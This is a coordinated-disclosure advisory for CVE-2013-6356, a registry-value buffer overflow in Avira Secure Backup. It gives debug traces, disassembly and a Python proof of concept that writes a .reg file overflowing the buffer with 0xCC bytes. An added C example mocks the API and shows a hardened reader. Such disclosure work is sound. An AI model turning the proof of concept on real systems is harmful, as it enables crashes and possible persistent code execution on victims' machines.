RCE Security Advisory
http://www.rcesecurity.com

1. ADVISORY INFORMATION
-----------------------
Product:        Avira Secure Backup
Vendor URL:     www.avira.com
Type:           Improper Restriction of Operations within the Bounds of a Memory Buffer [CWE-119]
Date found:     2013-10-30
Date published: 2013-11-16
CVSSv2 Score:   4.4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CVE:            CVE-2013-6356

2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

3. VERSIONS AFFECTED
--------------------
Avira Secure Backup v1.0.0.1 Build 3616

4. VULNERABILITY DESCRIPTION
----------------------------
A buffer overflow vulnerability has been identified in Avira Secure Backup v1.0.0.1 Build 3616.

The application loads the values of the Registry Keys "AutoUpdateDownloadFilename" and "AutoUpdateProgressFilename" from "HKEY_CURRENT_USER\Software\Avira Secure Backup" on startup but does not properly validate the length of the fetched values before using them in the further application context, which leads to a buffer overflow condition with possible persistent code execution.

The application queries the values via a RegQueryValueExW call with a fixed buffer pointer (lpData) and a fixed buffer size pointer (lpcbData). If the input string size is greater than the predefined size, the application uses a second RegQueryValueExW call with the new buffer size set to the length of the input string, but reuses the original buffer pointer (lpData), which has not been resized. This results in overwriting memory space including SEH records.

An attacker needs to force the victim to import an arbitrary .reg file in order to exploit the vulnerability. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in a denial-of-service condition.

The attack scenario is persistent, because the code is executed as long as the manipulated values are loaded into the Registry.
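The lpData/lpcbData contract described above, as an added example that is neither Avira's code nor the advisory's: a constructed mock of RegQueryValueExW with the real API's ERROR_MORE_DATA semantics, the advisory's fixed-buffer retry (reported as the number of bytes it would overrun rather than executed), and a hardened reader that allocates from the reported size and enforces a cap. The mock_ names, the 8192-character store and the cap values are assumptions; the 0x820 buffer size comes from the disassembly and the 1240-character value mirrors the PoC.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
/* Constructed stand-ins for the Win32 types and error codes RegQueryValueExW uses. */
typedef uint32_t DWORD;
typedef uint16_t WCHAR;                     /* registry strings are UTF-16 */
enum { ERROR_SUCCESS = 0, ERROR_MORE_DATA = 234 };
/* Constructed mock registry: one REG_SZ value, stored without a terminating NUL. */
static WCHAR g_mock_value[8192];
static DWORD g_mock_value_bytes;
void mock_set_value(size_t nchars, WCHAR fill) {
    for (size_t i = 0; i < nchars && i < 8192; i++) g_mock_value[i] = fill;
    g_mock_value_bytes = (DWORD)(nchars * sizeof(WCHAR));
}
/* Same lpData/lpcbData contract as the real API: NULL lpData only reports the size; a
 * too-small *lpcbData gets the required size and ERROR_MORE_DATA with nothing written. */
long mock_RegQueryValueExW(void *lpData, DWORD *lpcbData) {
    if (lpData != NULL && *lpcbData < g_mock_value_bytes) {
        *lpcbData = g_mock_value_bytes;
        return ERROR_MORE_DATA;
    }
    if (lpData != NULL) memcpy(lpData, g_mock_value, g_mock_value_bytes);
    *lpcbData = g_mock_value_bytes;
    return ERROR_SUCCESS;
}
/* The advisory's pattern: fixed 0x820-byte buffer, then after ERROR_MORE_DATA a second call
 * with the enlarged size but the same pointer. That copy is not performed (undefined
 * behaviour); the function returns how many bytes it would write past the buffer. */
DWORD vulnerable_pattern_overrun_bytes(void) {
    unsigned char buf[0x820];
    DWORD cb = sizeof(buf);
    if (mock_RegQueryValueExW(buf, &cb) != ERROR_MORE_DATA) return 0; /* value fit */
    return cb - (DWORD)sizeof(buf);   /* overrun of mock_RegQueryValueExW(buf, &cb) */
}
/* Hardened reader: query the size first, reject anything above max_bytes, allocate a
 * buffer that really is that big, and NUL-terminate regardless of the stored data. */
WCHAR *read_value_safe(DWORD max_bytes) {
    DWORD cb = 0;
    if (mock_RegQueryValueExW(NULL, &cb) != ERROR_SUCCESS || cb > max_bytes) return NULL;
    WCHAR *out = calloc(cb / sizeof(WCHAR) + 2, sizeof(WCHAR)); /* +2: room for a NUL */
    if (out == NULL) return NULL;
    /* A value that grew between the two calls comes back as ERROR_MORE_DATA: fail closed. */
    if (mock_RegQueryValueExW(out, &cb) != ERROR_SUCCESS) { free(out); return NULL; }
    out[cb / sizeof(WCHAR)] = 0;
    return out;
}
long safe_value_len(DWORD max_bytes) {       /* chars read, or -1 if rejected */
    WCHAR *v = read_value_safe(max_bytes);
    if (v == NULL) return -1;
    long n = 0; while (v[n]) n++;
    free(v); return n;
}
```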
5. DEBUG INFORMATION
--------------------
Call stack of main thread:

Address   Returns to   Procedure / arguments              Called from
0012EB48  77DA6F87     <JMP.&ntdll.memmove>               ADVAPI32.77DA6F82
0012EB4C  0012ECBC     dest = 0012ECBC
0012EB50  0015760C     src = 0015760C
0012EB54  00002712     n = 2712 (10002.)
0012EC28  77DA708B     ADVAPI32.77DA6E02                  ADVAPI32.77DA7086
0012EC60  0043F15D     Includes ADVAPI32.77DA708B         Avira_Se.0043F15B
0012EC9C  0043F3F8     Avira_Se.0043F0D2                  Avira_Se.0043F3F3
0012F5B4  00CC00CC     *** CORRUPT ENTRY ***

The vulnerable code part of Avira Secure Backup.exe:

0043F0D2  PUSH EBP
0043F0D3  MOV EBP,ESP
0043F0D5  SUB ESP,10
0043F0D8  PUSH EBX
0043F0D9  PUSH ESI
0043F0DA  MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>   ; ADVAPI32.RegOpenKeyExW
0043F0E0  PUSH EDI
0043F0E1  LEA EAX,DWORD PTR SS:[EBP-8]
0043F0E4  PUSH EAX                                    ; /pHandle
0043F0E5  PUSH 20019                                  ; |Access
0043F0EA  XOR EBX,EBX                                 ; |
0043F0EC  PUSH EBX                                    ; |Reserved => 0
0043F0ED  PUSH DWORD PTR SS:[EBP+C]                   ; |Subkey
0043F0F0  MOV BYTE PTR SS:[EBP-1],BL                  ; |
0043F0F3  PUSH DWORD PTR SS:[EBP+8]                   ; |hKey
0043F0F6  MOV DWORD PTR SS:[EBP-C],820                ; |
0043F0FD  CALL ESI                                    ; \RegOpenKeyExW
0043F0FF  MOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQuer>   ; ADVAPI32.RegQueryValueExW
0043F105  TEST EAX,EAX
0043F107  JNZ SHORT Avira_Se.0043F133
0043F109  LEA EAX,DWORD PTR SS:[EBP-C]
0043F10C  PUSH EAX                                    ; /pBufSize
0043F10D  PUSH DWORD PTR SS:[EBP+14]                  ; |Buffer
0043F110  LEA EAX,DWORD PTR SS:[EBP-10]               ; |
0043F113  PUSH EAX                                    ; |pValueType
0043F114  PUSH EBX                                    ; |Reserved => NULL
0043F115  PUSH DWORD PTR SS:[EBP+10]                  ; |ValueName
0043F118  PUSH DWORD PTR SS:[EBP-8]                   ; |hKey
0043F11B  CALL EDI                                    ; \RegQueryValueExW
0043F11D  TEST EAX,EAX
0043F11F  JNZ SHORT Avira_Se.0043F125
0043F121  MOV BYTE PTR SS:[EBP-1],1
0043F125  PUSH DWORD PTR SS:[EBP-8]                   ; /hKey
0043F128  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>   ; \RegCloseKey
0043F12E  CMP BYTE PTR SS:[EBP-1],BL
0043F131  JNZ SHORT Avira_Se.0043F16E
0043F133  LEA EAX,DWORD PTR SS:[EBP-8]
0043F136  PUSH EAX
0043F137  PUSH 20119
0043F13C  PUSH EBX
0043F13D  PUSH DWORD PTR SS:[EBP+C]
0043F140  PUSH DWORD PTR SS:[EBP+8]
0043F143  CALL ESI
0043F145  TEST EAX,EAX
0043F147  JNZ SHORT Avira_Se.0043F16E
0043F149  LEA EAX,DWORD PTR SS:[EBP-C]
0043F14C  PUSH EAX
0043F14D  PUSH DWORD PTR SS:[EBP+14]
0043F150  LEA EAX,DWORD PTR SS:[EBP-10]
0043F153  PUSH EAX
0043F154  PUSH EBX
0043F155  PUSH DWORD PTR SS:[EBP+10]
0043F158  PUSH DWORD PTR SS:[EBP-8]
0043F15B  CALL EDI
0043F15D  TEST EAX,EAX
0043F15F  JNZ SHORT Avira_Se.0043F165
0043F161  MOV BYTE PTR SS:[EBP-1],1
0043F165  PUSH DWORD PTR SS:[EBP-8]                   ; /hKey
0043F168  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>   ; \RegCloseKey
0043F16E  XOR EAX,EAX
0043F170  CMP BYTE PTR SS:[EBP-1],BL
0043F173  POP EDI
0043F174  POP ESI
0043F175  SETNE AL
0043F178  POP EBX
0043F179  LEAVE
0043F17A  RETN

6. PROOF-OF-CONCEPT (CODE / EXPLOIT)
------------------------------------
Use the following code to exploit the vulnerability:

#!/usr/bin/python
# Writes a .reg file whose "AutoUpdateProgressFilename" value is 1240 bytes of 0xCC;
# imported as a 1240-character REG_SZ it exceeds the application's 0x820-byte buffer.
filename = "poc.reg"
junk1 = "\xCC" * 1240
poc = "Windows Registry Editor Version 5.00\n\n"
poc = poc + r"[HKEY_CURRENT_USER\Software\Avira Secure Backup]" + "\n"
poc = poc + "\"AutoUpdateProgressFilename\"=\"" + junk1 + "\""
try:
    print("[*] Creating exploit file...\n")
    # latin-1 keeps every "\xCC" as the single byte 0xCC, as the Python 2 original did
    writeFile = open(filename, "w", encoding="latin-1")
    writeFile.write(poc)
    writeFile.close()
    print("[*] File successfully created!")
except OSError:
    print("[!] Error while creating file!")

7. SOLUTION
-----------
Update to v1.0.0.2 Build 3630 or later.

8. REPORT TIMELINE
------------------
2013-10-30: Discovery of the vulnerability
2013-11-03: RCE Security sends first notification to vendor via mail with disclosure date set to 18 November 2013
2013-11-03: MITRE assigns CVE-2013-6356 for this issue
2013-11-04: Vendor ACKs the vulnerability
2013-11-10: RCE Security asks for a status
2013-11-11: Vendor expects to receive a fix the same day
2013-11-13: Vendor releases v1.0.0.2 Build 3630 which fixes CVE-2013-6356
2013-11-16: Coordinated Disclosure

9. REFERENCES
-------------
http://www.rcesecurity.com/2013/11/cve-2013-6356-avira-secure-backup-v1-0-0-1-buffer-overflow-anatomy-of-a-vulnerability/